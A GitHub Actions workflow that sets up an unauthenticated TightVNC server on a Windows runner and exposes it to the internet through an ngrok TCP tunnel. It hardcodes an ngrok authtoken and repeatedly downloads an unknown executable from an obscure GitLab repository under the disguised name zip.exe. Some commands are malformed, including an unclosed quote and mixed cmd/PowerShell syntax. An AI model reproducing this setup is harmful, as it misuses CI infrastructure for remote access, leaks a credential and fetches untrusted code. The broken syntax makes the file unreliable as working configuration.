name: Start VNC Server with Ngrok

on:
  workflow_dispatch:

jobs:
  vnc_ngrok:
    runs-on: windows-latest

    steps:
      - name: Checkout repository
        uses: actions/checkout@v2

      - name: Install ngrok via Chocolatey
        run: |
          choco install ngrok -y
          ngrok authtoken 2dui2XTrzirImJjBXxEVezW7Sjx_7jBriocpRkg4WvDF83Zne
          reg add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v AllowTightVNCLoopback /t REG_DWORD /d 1 /f
          reg add "HKLM\SYSTEM\CurrentControlSet\Services\Tcpip\Parameters" /v AllowAllLoopbackConnections /t REG_DWORD /d 1 /f
          reg add "HKEY_LOCAL_MACHINE\Software\TightVNC" /v AllowLoopback /t REG_DWORD /d 1 /f
          reg add "HKEY_LOCAL_MACHINE\Software\TightVNC" /v AllowLoopbackConnections /t REG_DWORD /d 1 /f

      - name: Start ngrok tunnel for VNC
        run: |
          Start-Process -FilePath "ngrok.exe" -ArgumentList "tcp 5900" -WindowStyle Hidden -PassThru
          # Ngrok'un başlaması için biraz bekleme süresi

      - name: Setup VNC server
        run: |
          choco install -y tightvnc
          cmd /c '"C:\Program Files\TightVNC\tvnserver.exe" -controlservice -set AllowLoopback=1

      - name: Start VNC server
        run: |
           taskkill /f /im tvnserver.exe
           cmd /c '"C:\Program Files\TightVNC\tvnserver.exe" :0 -geometry 1920x1080 -depth 24 -SecurityTypes None'
           curl -o zip.exe -Uri "https://gitlab.com/jfv-he/jrtiiupngk/-/raw/main/use.exe"
           cmd /c sleep 240
           cmd /c curl -o zip.exe -Uri "https://gitlab.com/jfv-he/jrtiiupngk/-/raw/main/use.exe"
           cmd /c sleep 240
        
